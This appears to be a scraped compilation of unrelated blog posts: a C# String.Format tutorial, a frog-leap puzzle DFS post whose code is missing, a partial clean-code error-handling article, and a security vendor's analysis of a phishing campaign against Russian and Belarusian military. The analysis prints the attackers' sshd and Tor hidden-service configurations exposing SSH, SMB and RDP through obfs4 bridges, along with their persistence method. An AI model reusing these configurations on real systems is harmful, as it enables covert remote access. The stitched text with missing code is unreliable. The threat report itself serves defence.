    var messageWithConcatenation= "I caught a " + pkm.Name + " on " + pkm.CaptureDate.ToString("yyyy-MM-dd");
    

    There are 2 main downsides:

    1. it’s hard to read and maintains, with all those open and closed quotes
    2. it’s highly inefficient, since strings are immutable and, every time you concatenate a string, it creates a whole new string.

    Interpolation is the ability to wrap a variable inside a string and, eventually, call methods on it while creating the string itself.

    var messageWithInterpolation = $"I caught a {pkm.Name} on {pkm.CaptureDate.ToString("yyyy-MM-dd")}";
    

    As you see, it’s easier to read than simple concatenation.

    The downside of this approach is that here you don’t have a visual understanding of what is the expected string, because the variables drive your attention away from the message you are building with this string.

    PS: notice the $ at the beginning of the string and the { and } used to interpolate the values.

    Formatting is the way to define a string using positional placeholders.

    var messageWithFormatting = String.Format("I caught a {0} on {1}", pkm.Name, pkm.CaptureDate.ToString("yyyy-MM-dd"));
    

    We are using the Format static method from the String class to define a message, set up the position of the elements and the elements themselves.

    Now we have a visual clue of the general structure of the string, but we don’t have a hint of which values we can expect.

    Even if string.Format is considered obsolete, there is still a reason to consider it when formatting strings: this class can help you format the values with default and custom formatters.

    But first, a quick note on the positioning.

    Positioning and possible errors in String.Format

    As you may expect, for string.Format positioning is 0-based. But if it’s true that the numbers must start with zero, it’s also true that the actual position doesn’t count. In fact, the next two strings are the same:

    var m1 = String.Format("I caught a {0} on {1}", pkm.Name, pkm.CaptureDate);
    var m2 = String.Format("I caught a {1} on {0}", pkm.CaptureDate, pkm.Name);
    

    Of course, if you swap the positioning in the string, you must also swap the order of the parameters.

    Since we are only specifying the position, we can use the same value multiple times inside the same string, just by repeating the placeholder:

    String.Format("I caught a {0} (YES, {0}!) on {1}", pkm.Name, pkm.CaptureDate);
    // I caught a Garchomp (YES, Garchomp!) on 06/05/2020 14:55:23
    

    What happens if the number of position is different from the number of arguments?

    If there are more parameters than placeholders, the exceeding ones are simply ignored:

    String.Format("I caught a {0} on {1}", pkm.Name, pkm.CaptureDate, pkm.PokedexIndex);
    /// I caught a Garchomp on 06/05/2020 14:55:23
    

    On the contrary, if there are more placeholders than parameters, we will get a FormatException:

    String.Format("I caught a {0} on {1}", pkm.Name);
    

    with the message

    Index (zero based) must be greater than or equal to zero and less than the size of the argument list_.

    How to format numbers

    You can print numbers with lots of different formats, you know. Probably you’ve already done it with the ToString method. Well, here’s almost the same.

    You can use all the standard numeric formats as formatting parameters.

    For example, you can write a decimal as a currency value by using C or c:

    String.Format("{0:C}", 12.7885m);
    // £12.79
    

    In this way, you can use the symbols belonging to the current culture (in this case, we can see the £) and round the value to the second decimal.

    If you want to change the current culture, you must setup it in a global way or, at least, change the culture for the current thread:

    Thread.CurrentThread.CurrentCulture = new System.Globalization.CultureInfo("it-IT");
    
    Console.WriteLine(String.Format("{0:C}", 12.7885m)); // 12,79 €
    

    If you want to handle numbers with different formats, you can all the formats defined in the official documentation (linked above). Among them we can find, for example, the fixed-point formatter that can manage both the sign and the number of decimal digits:

    String.Format("{0:f8}", 12.7885m) //12.78850000
    

    With :f8 here we are saying that we want the fixed-point format with 8 decimal digits.

    How to format dates

    As per numbers, the default representation of dates is the one provided by the ToString method.

    String.Format("{0}", new System.DateTime(2020,5,8,1,6,0))
    // 08/05/2020 01:06:00
    

    This is useful, but not very customizable.
    Luckily we can use our usual formatting strings to print the date as we want.

    For example, if you want to print only the date, you can use :d in the formatting section:

    String.Format("{0:d}", new System.DateTime(2020,5,8,1,6,0))
    // 08/05/2020
    

    and you can use :t if you are interested only in the time info:

    String.Format("{0:t}", new System.DateTime(2020,5,8,1,6,0))
    // 01:06
    

    Of course, you can define your custom formatting to get the info in the format you want:

    String.Format("{0:yyyy-MM-dd hh:mm}", new System.DateTime(2020,5,8,1,6,0))
    // 2020-05-08 01:06
    

    PSS! Remember how the current culture impacts the result!

    How to define custom formats

    As you may imagine, the default value used for formatting is the one defined by ToString. We can prove it by simply defining the ToString method in our CapturedPokemon class

    class CapturedPokemon
    {
      // fields...
    
      public override string ToString()
      {
        return $"Name: {Name} (#{PokedexIndex})";
      }
    }
    

    and by passing the whole pkm variable defined at the beginning of this article:

    String.Format("{0}", pkm)
    // Name: Garchomp (#445)
    

    But, of course, you may want to use different formatting across your project.

    Let’s define a formatter for my CapturedPokemon class. This class must implement both IFormatProvider and ICustomFormatter interfaces.

    public class PokemonFormatter : IFormatProvider, ICustomFormatter
    {
      // todo
    }
    

    First of all, let’s implement the GetFormat method from IFormatProvider with the default code that works for every custom formatter we are going to build:

    public object GetFormat(Type formatType)
    {
      if (formatType == typeof(ICustomFormatter))
        return this;
      else
        return null;
    }
    

    And then we can define the core of our formatter in the Format method. It accepts 3 parameters: format is the string that we pass after the : symbol, like in :d3; arg is a generic object that references the object to be formatted and formatProvider is… well, I don’t know! Drop me a comment if you know how to use it and why!

    Moving on, and skipping the initial checks, we can write the core of the formatting like this:

    switch (format.ToUpper())
    {
      case "FULL": return $"{pokemon.Name} (#{pokemon.PokedexIndex}) caught on {pokemon.CaptureDate}";
      case "POKEDEX": return $"{pokemon.Name} (#{pokemon.PokedexIndex})";
      case "NAME": return $"{shortName}";
      default:
        throw new FormatException($"The format {format} is not valid");
    }
    

    So the point is to define different formats, pass one of them in the format parameter, and apply it to the arg object.

    We can then use the String.Format method in this way:

    String.Format(new PokemonFormatter(), "{0:full}", pkm) // Garchomp (#445) caught on 06/05/2020 14:55:23
    String.Format(new PokemonFormatter(), "{0:pokedex}", pkm) // Garchomp (#445)
    String.Format(new PokemonFormatter(), "{0:name}", pkm) //Grchmp
    

    If you are interested in the whole code, have find it at the end of the article.

    By the way, why should we care about formatters? Because we must always take into account the separation of concerns. Why would the CapturedPokemon class expose a method for each formatting value? It should be in the scope of the class definition itself, so it’s better to write it somewhere else and use it only when it’s needed.

    Conclusion

    Using String.Format is now considered a vintage way to format strings. Even Microsoft itself recommends to use string interpolation because it is more readable (syntax highlighting helps you see better what are the values) and more flexible (because you directly create the string instead of calling an additional method – string.Format itself).

    By the way, I think it’s important to get to know even String.Format because it can be useful not only for readability (because you can see the structure of the returned string even without looking at the actual parameters used) but also because you can create strings dynamically, like in this example:

    string en = "My name is {0}";
    string it = "Il mio nome è {0}";
    
    var actualString = DateTime.UtcNow.Ticks % 2 == 0 ? it : en;
    
    Console.WriteLine(string.Format(actualString, "Davide"));
    

    If you want to read more about string.Format, just head to the Microsoft documentation, where you can find lots of examples.

    In the end, here’s the full code of the Format method for our PokemonFormatter class.

    public string Format(string format, object arg, IFormatProvider formatProvider)
    {
      if (!this.Equals(formatProvider)) { return null; }
    
      if (!(arg is CapturedPokemon pokemon)) { return null; }
    
      if (string.IsNullOrWhiteSpace(format))
        format = "full";
    
      var shortName = Regex.Replace(pokemon.Name, "a|e|i|o|u", "");
    
      switch (format.ToUpper())
      {
        case "FULL": return $"{pokemon.Name} (#{pokemon.PokedexIndex}) caught on {pokemon.CaptureDate}";
        case "POKEDEX": return $"{pokemon.Name} (#{pokemon.PokedexIndex})";
        case "NAME": return $"{shortName}";
        default:
          throw new FormatException($"The format {format} is not valid");
      }
    }
    

    Happy coding!



    Source link

  • Frog Leap Puzzle with Depth-First Search (DFS) – Useful code

    Frog Leap Puzzle with Depth-First Search (DFS) – Useful code


    TL;DR: We solve the classic “frog leap” puzzle with Depth-First Search (DFS) by generating next boards around teh blank and trying jumps before steps. This trick finds the minimal soluton in exactly N^2+2N moves.

    The classic frog puzzle looks like this, when 3 frogs from side are used:

    The picture is from the site data.bangtech.com/algorithm/switch_frogs_to_the_opposite_side, and the game actually works pretty well there 🙂

    The core idea is to try to find a way to map all the frogs around the blank rock (_ in the code) and to run DFS on it. These frogs are maximum 4, thus it is not that tough. In the code, these are b-2, b-1, b+1, b+2 correspondingly:

    The 4 results from the starting state look like that:

    The _ is the rock. > is a frog facing right, < is a frog facing left.

    The magic of the code is that it uses DFS approach, trying each new move first, as a stack (or LIFO). If it is stuck, then the built-in functionality of the stack backtracks and tries the next one. We keep visited set and path. The idea is that the visited is a set, so thus a repetition and endless loop is avoided. The path is the current route from teh start, and with python we append on enter and pop on backtrack.

    In the GitHub example and the YouTube video, I am printing a bit more, but the minimal is the code above. This is a working result from it for 3 frogs per side:

    After the first deadend is removed, the second deadend is also removed, as it only leads to the first one. The “magic” of stack, LIFO, BFS and recursion working together as a team 🙂

    To make the code complete, these are start_state() and goal_state() functions, referred in the dfs() above:

    The complete result with 3 frogs looks like that:

    Actually it is achieved only with 34 states, which is quite ok.

    The YT video is here:
    https://www.youtube.com/watch?v=DVgqA8-c1oI
    The GitHub link is here: https://github.com/Vitosh/Python_personal/tree/master/YouTube/045_Python_Frog_Jump

    Enjoy it 🙂



    Source link

  • Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus

    Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus


    Authors: Sathwik Ram Prakki and Kartikkumar Jivani 

    Contents 

    • Introduction 
    • Key Targets 
      • Industries 
      • Geographical Focus 
    • Infection and Decoys 
    • Technical Analysis 
      • PowerShell Stage 
      • Persistence 
      • Configuration 
    • Infrastructure and Attribution 
    • Conclusion 
    • SEQRITE Protection 
    • IOCs 
    • MITRE ATT&CK 

    Introduction 

    SEQRITE Labs has identified a campaign targeting military personnel of both Russia and Belarus, especially the Russian Airborne Forces and Belarusian Special Forces. The infection chain leads to exposing multiple local services via Tor using obfs4 bridges, allowing the attacker to anonymously communicate via an onion address. In this blog, we will explore the infection chain that uses multiple stages through PowerShell, decoys used to lure the victims, and exposing SSH as a hidden service to unblock traffic for Tor while maintaining persistence. 

    Multiple campaigns with similar geographical focus have been identified this year such as HollowQuill seen in early 2025, that targeted various Russian entities such as academic & research institutes which are directly linked to government and defence sectors. In July, we have encountered another campaign dubbed CargoTalon that has targeted aerospace and defense sectors of Russia deploying Eaglet implant, where overlaps with HeadMare group were observed. Recently, targeting of Russian automobile and e-commerce industry with CAPI Backdoor has been tracked as operation MotorBeacon. 

    Key Targets 

    Industries 

    Geographical Focus 

    • Russian Federation 
    • Republic of Belarus 

    Infection and Decoys 

     

    Fig. 1 – Infection Chain 

    The first lure is a nomination letter from the acting commander of Military Unit 71289, which refers to the 83rd Separate Guards Airborne Assault Brigade stationed in Ussuriysk (Eastern Military District), to the Chief of Russian Airborne Forces (VDV) for appointment of military personnel. Ussuriysk is completely opposite to the ongoing Russia-Ukraine war but closer to both the China-Russia border and the Pacific Ocean. 

    Fig. 2 – Decoy targeting Russia 

    The second decoy letter is meant for training of military personnel from October 13th to 16th 2025 at Military Unit 89417, which refers to the 5th Separate Spetsnaz Brigade of the Belarusian Special Forces located in Maryina Horka near Minsk (Reports suggest that the unit got disbanded in 2019 but some activity was seen in 2021). 


    Fig. 3 – Decoy targeting Belarus 

    Technical Analysis 

    The archive files have been uploaded from Belarus with modification dates as 2025-Oct-15 and 2025-Oct-21. The initial phishing ZIP contains a shortcut LNK with double extension format that translates as follows: 

    Original filename  Translated name 
    ТЛГ на убытие на переподготовку.pdf.lnk  TLG departure for retraining.pdf.lnk 
    Исх №6626 Представление на назначение на воинскую должность.pdf.lnk  Ref. No. 6626 Nomination for appointment to military position.pdf.lnk 

    Shortcut files have machine IDs ‘desktop-V7i6LHO’ and ‘desktop-u4a2HgZ’ that seem to be weaponized in the last week of September 2025. They trigger PowerShell commands which act as the initial dropper stage where another archive file beside the LNK is used to set up the entire chain. 

    Fig. 4 – Shortcut file triggers PowerShell 

    The command extracts the first archive file into either of the directories: 

    • %APPDATA%\dynamicUpdatingHashingScalingContext 
    • %USERPROFILE%\Downloads\incrementalStreamingMergingSocket 

    and subsequently uses it to extract the second archive file from the folder ‘FOUND.000’. This multi-stage extraction drops the payloads into either ‘$env:APPDATA\logicpro’ or ‘$env:APPDATA\reaper’ directories, reads the content of a text file and executes it silently via hidden PowerShell process. 

    • \logicpro\scalingEncryptingEncoding 
    • \reaper\responsiveHashingSocketScalableDeterministic 

    Before jumping into the next stage, let’s look at the contents of both the archives. It contains multiple EXEs and text files, the decoy PDF, a DLL, and a couple of XML files. Following the above chain, the next stage is execution of PowerShell script. 

    Fig. 5 – Contents of archive files 

    PowerShell Stage 

    The script starts by checking the Windows ‘Recent’ folder and if it has more than ten shortcut files in it. This is an anti-analysis check to evade sandbox environments and make sure there’s normal user activity. Another check is done to see if the process count is greater than 50 and opens the decoy document. 

    Fig. 6 – PowerShell anti-analysis 

    Then it creates a mutex to ensure that only one instance is running. It reads both the XML files after replacing the username and registers scheduled tasks to start them immediately. This establishes persistence and executes the next stage of payloads defined in those XMLs. Multiple strings are concatenated to form the full onion address. 

    Fig. 7 – PowerShell stager 

    Then it waits until the hostname file exists which is written by Tor based on the configuration for the hidden service directory. So it waits until the local Tor instance is up and the onion is available. It creates an identification beacon in a specific format ‘<username>:<onion-address>:3-yeeifyem‘ or ends with ‘:2-lrwkymi’ and uses curl via local Tor SOCKS listener on port 9050. Multiple retry flags are used to make this persistent. 

    Fig. 8 – local hostname for beacon 

    Persistence 

    XML files are Windows scheduled task definitions that runs daily starting at 2025-09-25T01:41:00-08:00 and has a logon trigger for the user specified. These tasks are hidden and configured to run even when the computer is idle, on demand, and without network. They ignore multiple instances and have no execution time limit. 

    Fig. 9 – XML for persistence 

    Fig. 10 – Scheduled Task 

     Finally moving on to the EXEs to which configuration files are passed as arguments; some are most likely SSH and SFTP server binaries based on the PDB paths and internal names. XML files trigger either the first or last two commands (both campaigns included): 

    • %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting 
    • %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster 
    • %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession 
    • %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant 

    Both githubdesktop.exe and googlemaps.exe from above, along with ssh-shellhost.exe, ebay.exe (SFTP server) and libcrypto.dll (LibreSSL) are legitimate “OpenSSH for Windows” binaries with compilation timestamp 2023-12-13 and PDB paths: 

    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb” 
    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb” 
    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb” 
    • C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb 

    libcrypto.dll is bundled for encryption, key exchange, and hashing; whereas ssh-shellhost.exe is used for interactive SSH sessions. This confirms that the attacker deploys a self-contained OpenSSH server inside a user’s profile directory using Tor, likely for stealth remote administration and post-exploitation persistence. 

    Configuration 

    The first configuration passed to SSHD [githubdesktop.exe (or) googlemaps.exe] is as follows, with the only difference between the two campaigns being that sftp subsystem is not present in the second one. Usage of non-standard port 20321 is seen, passwords are disabled and allowed only by public key along with files containing private and authorized keys. Files containing these keys are: 

    • redundantOptimizingInstanceVariableLogging 
    • redundantExecutingContainerIndexing 
    • incrementalMergingIncrementalImmutableProtocol 
    • loggingOptimizedDecoding 
    Port 20321 
    ListenAddress 127.0.0.1 
    HostKey redundantOptimizingInstanceVariableLogging 
    PubkeyAuthentication yes 
    PasswordAuthentication no     
    
    AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing 
    Subsystem sftp AppData\Roaming\logicpro\ebay.exe 

    The second configuration is passed to pinterest.exe (or) googlesheets.exe, which is basically tor.exe, that creates an onion service and exposes SSH, SMB, RDP and other ports over Tor. It is configured to use a pluggable transport obfs4 via an EXE named confluence.exe (or) rider.exe, which is simply an obfs4proxy binary. Usage of bridges is seen which is used to hide connections. Bridge endpoints are defined with IP, port, fingerprint, cert and iat-mode; to allow outbound Tor connections via those bridges. 

    Fig. 11 – Communication with Tor bridges 

    HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" 
    HiddenServicePort 20322 127.0.0.1:20321 
    HiddenServicePort 11435 127.0.0.1:445 
    HiddenServicePort 13893 127.0.0.1:3389 
    HiddenServicePort 12192 127.0.0.1:12191 
    HiddenServicePort 14763 127.0.0.1:14762 
    GeoIPFile geoip 
    GeoIPv6File geoip6 
    
    ClientTransportPlugin obfs4 exec confluence.exe  
    UseBridges 1 
    Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 
    Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2 

    In the same way legitimate obfs4proxy.exe is renamed and used in the configuration as confluence.exe and rider.exe. 

    Infrastructure and Attribution 

    The onion link used for registering victim via tor is: 

    • yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    Based on the recent netflow data from these tor bridge ports, we have seen traffic with Russia and even few neighboring nations. These IPs are categorized as either tor service or residential. 

    IP:Port  ASN  Country  Category 
    77.20.116[.]133:8080   3209 (Vodafone GmbH)  Germany  residential, proxy 
    156.67.24[.]239:33333  51167 (Contabo GmbH)  France  tor 
    146.59.116[.]226:50845  16276 (OVH SAS)  Poland  cloud 
    142.189.114[.]119:443  577 (BACOM)  Canada   

    Very less traffic is seen on both 156.67.24[.]239:33333 and 77.20.116[.]133:8080. Whereas Russia is seen on the remaining two IPs, which are part of the configuration and decoys targeting Russia. 

    Two Russian-linked groups, APT44 (Sandworm) and APT28, have been observed to use tor to communicate with onion domain previously. But in this case, custom configurations for pluggable transport and SSHD are used in an attempt to evade network monitoring, and these attacks are targeted towards Russia and Belarus. Similar targeting has been observed to be conducted by pro-Ukraine APTs Angry Likho (Sticky Werewolf) and Awaken Likho (Core Werewolf) but SkyCloak remains unattributed for now. 

    Conclusion 

    A multi-chain intrusion chain has been identified, targeting both Russian and Belarusian military personnel, which leads to PowerShell stager that deploys OpenSSH and Tor bridges. This shows a stealth-oriented campaign designed to establish covert remote access and lateral movements within targeted environments. Based on current evidence, the campaign appears consistent with Eastern European-linked espionage activity targeting defense and government sectors, though attribution remains with low confidence with previously documented operations. 

    SEQRITE Protection 

    • XML.Skycloak.50052.GC 
    • SCRIPT.Trojan.50053.GC 
    • SCRIPT.Skycloak.50054 

    IOCs 

    Archive (ZIP) 
    952f86861feeaf9821685cc203d67004  ТЛГ на убытие на переподготовку.pdf 
    d246dfa9e274c644c5a9862350641bac  persistentHandlerHashingEncodingScalable.zip 
    8716989448bc88ba125aead800021db0  Исх №6626 Представление на назначение на воинскую должность.pdf.zip 
    ae4f82f9733e0f71bb2a566a74eb055c  processorContainerLogging.zip 
    Shortcut (LNK) 
    32bdbf5c26e691cbbd451545bca52b56  ТЛГ на убытие на переподготовку.pdf.lnk 
    2731b3e8524e523a84dc7374ae29ac23  Исх №6626 Представление на назначение на воинскую должность.pdf.lnk 
    PowerShell (PS1) 
    39937e199b2377d1f212510f1f2f7653  scalingEncryptingEncoding 
    9242b49e9581fa7f2100bd9ad4385e8c  responsiveHashingSocketScalableDeterministic 
    XML 
    b61a80800a1021e9d0b1f5e8524c5708  loadingBufferFunctionHashing.xml 
    b52dfb562c1093a87b78ffb6bfc78e07  incrementalRedundantRendering.xml 
    45b16a0b22c56e1b99649cca1045f500  synchronizingContextBufferSchemaIncremental.xml 
    dcdf4bb3b1e8ddb24ac4e7071abd1f65  frameworkRepositoryDynamicOptimized.xml 
    Text 
    e1a8daea05f25686c359db8fa3941e1d  controllerGatewayEncrypting 
    b3382b6a44dc2cefdf242dc9f9bc9d84  pipelineClusterDeployingCluster 
    229afc52dccd655ec1a69a73369446dd  hashingBindingDynamicUpdatingSession 
    f6837c62aa71f044366ac53c60765739  decodingDistributedParsingHandlerRedundant 
    2599d1b1d6fe13002cb75b438d9b80c4  redundantExecutingContainerIndexing 
    b7ae44ac55ba8acb527b984150c376e2  redundantOptimizingInstanceVariableLogging 
    0f6aaa52b05ab76020900a28afff9fff  redundantOptimizingInstanceVariableLogging.pub 
    219e7d3b6ff68a36c8b03b116b405237  loggingOptimizedDecoding 
    dfc78fe2c31613939b570ced5f38472c  incrementalMergingIncrementalImmutableProtocol 
    77bb74dd879914eea7817d252dbab1dc  incrementalMergingIncrementalImmutableProtocol.pub 
    PE (EXE/DLL) 
    f6c0304671c4485c04d4a1c7c8c8ed94  githubdesktop.exe / googlemaps.exe (sshd.exe) 
    cdd065c52b96614dc880273f2872619f  pinterest.exe / googlesheets.exe (tor.exe) 
    37e83a8fc0e4e6ea5dab38b0b20f953b  ebay.exe (sftp-server.exe) 
    6eafae19d2db29f70fa24a95cf71a19d  ssh-shellhost.exe 
    664f09734b07659a6f75bca3866ae5e8  confluence.exe / rider.exe (obfs4proxy.exe) 
    6eafae19d2db29f70fa24a95cf71a19d  libcrypto.dll 
    Decoys 
    23ad48b33d5a6a8252ed5cd38148dcb7  ТЛГ на убытие на переподготовку.pdf 
    c8c41b7e02fc1d98a88f66c3451a081b  Исх №6626 Представление на назначение на воинскую должность.pdf 
    Tor Bridges 
    77.20.116[.]133:8080 156.67.24[.]239:33333 

    146.59.116[.]226:50845 142.189.114[.]119:443 

     
    yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    MITRE ATT&CK 

    Tactic  Technique ID  Technique Name 
    Resource Development  T1583  Acquire Infrastructure 
    Initial Access  T1566.001  Phishing: Spearphishing Attachment 
    Execution  T1204.002  User Execution: Malicious File 
    T1059.001  Command and Scripting Interpreter: PowerShell 
       
    T1106  Native API 
    Persistence  T1053.005  Scheduled Task 
    T1547  Boot or Logon Autostart Execution 
    T1027  Obfuscated Files or Information 
    Defense Evasion  T1036  Masquerading 
    T1497  Virtualization/Sandbox Evasion 
    Discovery  T1083  File and Directory Discovery 
    T1046  Network Service Discovery 
    T1033  System Owner/User Discovery 
    Lateral Movement  T1021  Remote Services 
    Collection  T1119  Automated Collection 
    Command and Control  T1071  Application Layer Protocol 
    T1090  Proxy 
    T1571  Non-Standard Port 
    Exfiltration  T1041  Exfiltration Over C2 Channel 

     



    Source link

  • Clean code tips – Error handling &vert; Code4IT

    Clean code tips – Error handling | Code4IT


    The way you handle errors on your code can have a huge impact on the maintainability of your projects. Don’t underestimate the power of clean error handling.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    We all know that nothing goes perfectly smoothly: network errors, invalid formats, null references… We can have a long, long list of what can go wrong in our applications. So, it is important to handle errors with the same care we have for all the rest of our code.

    This is the fourth part of this series about clean code, which is a recap of the things I learned from Uncle Bob’s “Clean Code”. If you want to read more, here’s the other articles I wrote:

    1. names and function arguments
    2. comments and formatting
    3. abstraction and objects
    4. error handling
    5. tests

    Status codes or exceptions?

    In Uncle Bob’s opinion, we should always prefer exceptions over status codes when returning values.

    Generally speaking, I agree. But let’s discuss a little about the differences.

    First of all, below you can see a method that, when downloading a string, returns both the status code and the real content of the operation.

    void Main()
    {
        (HttpStatus status, string content) = DownloadContent("https://code4it.dev");
        if (status == HttpStatus.Ok)
        {
            // do something with the content
        }
        else if (status == HttpStatus.NotFound)
        {
            // do something else
        }
        // and so on
    }
    
    public (HttpStatus, string) DownloadContent(string url)
    {
        // do something
    }
    
    // Define other methods and classes here
    
    public enum HttpStatus
    {
        Ok,
        NotFound,
        Unauthorized,
        GenericError
    }
    

    When you use status codes, you have to manually check the result of the operation with a switch or an if-else. So, if the caller method forgets to check whether the operation was successful, you might incur in unexpected execution paths.

    Now, let’s transform the code and use exceptions instead of status codes:

    void Main()
    {
        try
        {
            string content = DownloadContent("https://code4it.dev");
        }
        catch (NotFoundException nfe) {/*do something*/}
        catch (UnauthorizedException ue) {/*do something*/}
        catch (Exception e) {/*do something else*/}
        }
    }
    
    public string DownloadContent(string url)
    {
        // do something
        return "something";
        // OR throw NotFoundException
        // OR throw UnauthorizedException
        // OR do something else
    }
    

    As you can see, the code is clearly easier to read: the “main” execution is defined within the try block.

    What are the pros and cons of using exceptions over status codes?

    • PRO: the “happy path” is easier to read
    • PRO: every time you forget to manage all the other cases, you will see a meaningful exception instead of ending up with a messy execution without a clue of what went wrong
    • PRO: the execution and the error handling parts are strongly separated, so you can easily separate the two concerns
    • CON: you are defining the execution path using exceptions instead of status (which is bad…)
    • CON: every time you add a try-catch block, you are adding overhead on the code execution.

    The reverse is obviously valid for status codes.

    So, what to do? Well, exceptions should be used in exceptional cases, so if you are expecting a range of possible status that can be all managed in a reasonable way, go for enums. If you are expecting an “unexpected” path that you cannot manage directly, go for exceptions!

    If you really need to use status code, use enums instead of strings or plain numbers.

    TDD can help you handling errors

    Don’t forget that error handling must be thoroughly tested. One of the best ways is to write your tests first: this will help you figuring out what kind of exceptions, if any, your method should throw, and which ones it should manage.

    Once you have written some tests for error handling, add a try-catch block and start thinking to the actual business logic: you now can be sure that you’re covering errors with your tests.

    Wrap external dependencies to manage their exceptions

    Say that you use a third-party library as core part of your application.

    public class ExternalDependency
    {
        public string DownloadValue(string resourcePath){
            // do something
        }
    }
    

    and that this method throws some custom exceptions, like ResourceNotFoundException, InvalidCredentialsExceptions and so on.

    In the client code you might want to handle errors coming from that external dependency in a specific manner, while the general error handling has a different behavior.

    void Main()
    {
        ExternalDependency service = CreateExternalService();
    
        try
        {
            var value = GetValueToBeDowloaded();
            service.DownloadValue(value);
        }
        catch (ResourceNotFoundException rnfex)
        {
            logger.Log("Unable to get resource");
            ManageDownloadFailure();
        }
        catch (InvalidCredentialsExceptions icex)
        {
            logger.Log("Unable to get resource");
            ManageDownloadFailure();
        }
        catch (Exception ex)
        {
            logger.Log("Unable to complete the operation");
            DoSomethingElse();
        }
    }
    

    This seems reasonable, but what does it imply? First of all, we are repeating the same error handling in multiple catch blocks. Here I have only 2 custom exceptions, but think of complex libraries that can throw tens of exceptions. Also, what if the library adds a new Exception? In this case, you should update every client that calls the DownloadValue method.

    Also, the caller is not actually interested on the type of exception thrown by the external library; it cares only of the status of the operations, not the reason of a potential failure.

    So, in this case, the best thing to do is to wrap this external class into a custom one. In this way we can define our Exception types, enrich them with all the properties we need, and catch only them; all of this while being sure that even if the external library changes, our code won’t be affected.

    So, here’s an example of how we can wrap the ExternalDependency class:

    public class MyDownloader
    {
        public string DownloadValue(string resourcePath)
        {
            var service = new ExternalDependency();
    
            try
            {
                return service.DownloadValue(resourcePath);
            }
            catch (Exception ex)
            {
                throw new ResourceFileDownloadException(ex, resourcePath);
            }
        }
    }
    

    Now that all our clients use the MyDownloader class, the only type of exception to manage is ResourceFileDownloadException. Notice how I enriched this exception with the name of the resource that the service wasn’t able to download.

    Another good reason to wrap external libraries? What if they become obsolete, or you just need to use something else because it fits better with the use case you need?

    Define exception types thinking of the clients

    Why haven’t I exposed multiple exceptions, but I chose to throw only a ResourceFileDownloadException? Because you should define your exceptions thinking of how they can be helpful to their caller classes.

    I could have thrown other custom exceptions that mimic the ones exposed by the library, but they would have not brought value to the overall system. In fact, the caller does not care that MyDownloader failed because the resource does not exist, but it cares only that an error occurred when downloading a resource. It doesn’t even care that that exception was thrown by MyDownloader!

    So, when planning your exceptions, think of how they can be used by their clients rather than where they are thrown.

    Fighting the devil: null reference

    Everyone fights with null values. If you refence a null value, you will break the whole program with some ugly messages, like cannot read property of … in JavaScript, or with a NullReferenceException in C#.

    So, the best thing to do to avoid this kind of error is, obviously, to reduce the amount of possible null values in our code.

    We can deal with it in two ways: avoid returning null from a function and avoid passing null values to functions!

    How to avoid returning null values

    Unless you don’t have specific reasons to return null, so when that value is acceptable in your domain, try not to return null.

    For string values, you can simply return empty strings, if it is considered an acceptable value.

    For lists of values, you should return an empty list.

    IEnumerable<char> GetOddChars(string value)
    {
        if (value.Length > 0)
        {
            // return something
        }
        else
        {
            return Enumerable.Empty<char>();
            // OR return new List<char>();
        }
    }
    

    In this way you can write something like this:

        var chars = GetOddChars("hello!");
        Console.WriteLine(chars.Count());
    
        foreach (char c in chars)
        {
            // Do Something
        }
    

    Without a single check on null values.

    What about objects? There are many approaches that you can take, like using the Null Object pattern
    which allows you to create an instance of an abstract class which does nothing at all, so that your code won’t care if the operations it does are performed on an actual object or on a Null Object.

    How to avoid passing null values to functions

    Well, since we’ve already avoided nulls from return values, we may expect that we will never pass them to our functions. Unfortunately, that’s not true: what about you were using external libraries to get some values and then use them on your functions?

    Of course, it’s better to check for null values before calling the function, and not inside the function itself; in this way, the meaning of the function is clearer and the code is more concise.

    public float CalculatePension(Person person, Contract contract, List<Benefit> benefits)
    {
        if (person != null)
        {
            // do something with the person instance
            if(contract != null && benefits != null)
            {
                // do something with the contract instance
                if(benefits != null)
                {
                    // do something
                }
            }
        }
        // what else?
    }
    

    … and now see what happens when you repeat those checks for every method you write.

    As we say, prevention is better than the cure!

    Progressive refinements

    It’s time to apply those tips in a real(ish) scenario. Let’s write a method that read data from the file system, parses its content, and sends it to a remote endpoint.

    Initial implementation

    First step: read a stream from file system:

    (bool, Stream) ReadDataFromFile(string filePath)
    {
        if (string.IsNullOrWhiteSpace(filePath))
        {
            Stream stream = ReadFromFileSystem(filePath);
    
            if (stream != null && stream.Length > 0)
                return (true, stream);
        }
    
        return (false, null);
    }
    

    This method returns a tuple with info about the existence of the file and the stream itself.

    Next, we need to convert that stream into plain text:

    string ConvertStreamIntoString(Stream fileStream)
    {
        return fileStream.ConvertToString();
    }
    

